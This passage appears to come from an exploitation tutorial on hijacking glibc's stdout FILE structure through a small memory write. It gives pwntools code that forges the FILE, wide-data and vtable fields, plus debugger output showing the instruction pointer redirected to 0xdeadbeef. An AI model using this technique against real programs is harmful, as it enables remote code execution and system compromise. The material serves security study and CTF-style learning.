00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000090 00 00 00 00 00 00 00 00 80 17 db f7 ff 7f 00 00 │····│····│····│····│
000000a0 20 17 db f7 ff 7f 00 00 c0 16 db f7 ff 7f 00 00 │ ···│····│····│····│
000000b0 60 16 db f7 ff 7f 00 00 00 16 db f7 ff 7f 00 00 │`···│····│····│····│
000000c0 a0 15 db f7 ff 7f 00 00 40 15 db f7 ff 7f 00 00 │····│····│@···│····│
000000d0 e0 14 db f7 ff 7f 00 00 80 14 db f7 ff 7f 00 00 │····│····│····│····│
000000e0 20 14 db f7 ff 7f 00 00 c0 13 db f7 ff 7f 00 00 │ ···│····│····│····│
000000f0 60 13 db f7 ff 7f 00 00 80 12 db f7 ff 7f 00 00 │`···│····│····│····│
00000100 c0 11 db f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000110 e0 14 e0 f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000120 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
...
Smaller write primitive
Assume we are limited in the write to the _IO_FILE struct (0xe0 bytes or less).
We can still achieve RCE via _IO_OVERFLOW by using the available space more efficiently.
Consider the base structure used for overwriting stdout:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Base layout of the forged stdout FILE (14 rows of 16 bytes = 0xe0 bytes).
FS = p64(FLAGS) + p64(0x0000000000000000) # flags / _IO_read_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_read_end / _IO_read_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_end / _IO_buf_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _markers / _chain
FS += p64(0x0000000000000001) + p64(0xffffffffffffffff) # _fileno / _flags2
FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # XXXX / _lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _offset / _codecvt
FS += p64(FAKE_WIDE_DATA) + p64(0x0000000000000000) # _wide_data / _freeres_list
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000001) + p64(0x0000000000000000) # _mode / _unused2
FS += p64(0x0000000000000000) + p64(FAKE_VTABLE) # _unused2 / vtable
To fulfill _wide_data->_IO_read_end == _wide_data->_IO_read_ptr we need the start of _wide_data to contain two equal values.
Inspecting the memory just before _IO_2_1_stdout_, we can see:
1
2
3
4
5
gef➤ x/30gx 0x7ffff7e045c0-0x18
0x7ffff7e045a8 <_IO_2_1_stderr_+200>: 0x0000000000000000 0x0000000000000000 # fake wide_data
0x7ffff7e045b8 <_IO_2_1_stderr_+216>: 0x00007ffff7e02030 0x00000000fbad0800 # stderr.vtable / stdout.flags
0x7ffff7e045c8 <_IO_2_1_stdout_+8>: 0x0000000000000000 0x0000000000000000
0x7ffff7e045d8 <_IO_2_1_stdout_+24>: 0x0000000000000000 0x0000000000000000
Pointing _wide_data to stdout-0x18 causes those two addresses to be interpreted as _wide_data->_IO_read_ptr and _wide_data->_IO_read_end. Since both are 0, that constraint is already met.
Next, we need _wide_data->_IO_write_ptr > _wide_data->_IO_write_base. With this setup, _wide_data->_IO_write_base maps to stdout._flags and _wide_data->_IO_write_ptr maps to stdout._IO_read_ptr, so we simply need to store a value larger than _flags in stdout._IO_read_ptr.
Pointing _wide_data 0x18 bytes before stdout has the added benefit that _wide_data->_wide_vtable also falls inside stdout (it lands in stdout._unused2).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Same misaligned vtable pointer as in the full-size example.
FAKE_VTABLE = libc.symbols["_IO_file_jumps"] - 0x68 - 0x18
# The fake _wide_data starts 0x18 bytes before stdout, so it overlaps stdout itself.
FAKE_WIDE_DATA = libc.symbols["_IO_2_1_stdout_"] -0x18
# The wide vtable is stdout itself; its __overflow slot (+0x18) is stdout._IO_read_base.
FAKE_WIDE_VTABLE = libc.symbols["_IO_2_1_stdout_"]
FS = p64(FLAGS) + p64(FLAGS+0x200) # flags / _IO_read_ptr (double as _wide_data->_IO_write_base / _IO_write_ptr)
FS += p64(0x0000000000000000) + p64(0xdeadbeef) # _IO_read_end / _IO_read_base (doubles as wide vtable __overflow)
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_base / _IO_write_ptr
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_write_end / _IO_buf_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_buf_end / _IO_save_base
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _IO_backup_base / _IO_save_end
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _markers / _chain
FS += p64(0x0000000000000001) + p64(0xffffffffffffffff) # _fileno / _flags2
FS += p64(0x0000000000000000) + p64(FAKE_LOCK) # XXXX / _lock
FS += p64(0xffffffffffffffff) + p64(0x0000000000000000) # _offset / _codecvt
FS += p64(FAKE_WIDE_DATA) + p64(0x0000000000000000) # _wide_data / _freeres_list
FS += p64(0x0000000000000000) + p64(0x0000000000000000) # _freeres_buf / __pad5
FS += p64(0x0000000000000001) + p64(FAKE_WIDE_VTABLE) # _mode / _unused2 (doubles as _wide_data->_wide_vtable)
FS += p64(0x0000000000000000) + p64(FAKE_VTABLE) # _unused2 / vtable
We can simply point _wide_data->_wide_vtable at stdout itself. Calling _IO_WOVERFLOW will then effectively call the pointer stored at stdout+0x18 (which is 0xdeadbeef in this example).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rbx : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rcx : 0x1
$rdx : 0xfbad0a00
$rsp : 0x00007fffffffcfb8 → 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff
$rbp : 0x00007fffffffcfd0 → 0x00007fffffffd010 → 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250
$rsi : 0xffffffff
$rdi : 0x00007ffff7e045c0 → 0x00000000fbad0800
$rip : 0xdeadbeef
$r8 : 0x00007fffffffd0c0 → 0x00000001ffffd0d0
$r9 : 0x0
$r10 : 0x00007fffffffd04f → 0x007fffffffd06000
$r11 : 0x00007fffffffd050 → 0x00007fffffffd060 → 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250
$r12 : 0xffffffff
$r13 : 0xd0
$r14 : 0x00007ffff7e045c0 → 0x00000000fbad0800
$r15 : 0x00007ffff7e056f0 → 0x0000000000000001
$eflags: [zero CARRY PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcfb8│+0x0000: 0x00007ffff7c8afe0 → <_IO_switch_to_wget_mode+0030> cmp eax, 0xffffffff ← $rsp
0x00007fffffffcfc0│+0x0008: 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250 → 0x00007fffffffd2b0
0x00007fffffffcfc8│+0x0010: 0x00000000000000d0
0x00007fffffffcfd0│+0x0018: 0x00007fffffffd010 → 0x00007fffffffd090 → 0x00007fffffffd110 → 0x00007fffffffd170 → 0x00007fffffffd180 → 0x00007fffffffd1b0 → 0x00007fffffffd250 ← $rbp
0x00007fffffffcfd8│+0x0020: 0x00007ffff7c8b533 → <_IO_wdefault_xsgetn+0203> cmp eax, 0xffffffff
0x00007fffffffcfe0│+0x0028: 0x00007ffff7fbd160 → 0x00007ffff7c00000 → 0x03010102464c457f
0x00007fffffffcfe8│+0x0030: 0x00007ffff7e045c0 → 0x00000000fbad0800
0x00007fffffffcff0│+0x0038: 0x0000000000000000
Since we only need to make sure that _wide_data->_IO_write_ptr is bigger than _wide_data->_IO_write_base, we can again use this to set rdx to an arbitrary address (it just needs to be greater than flags).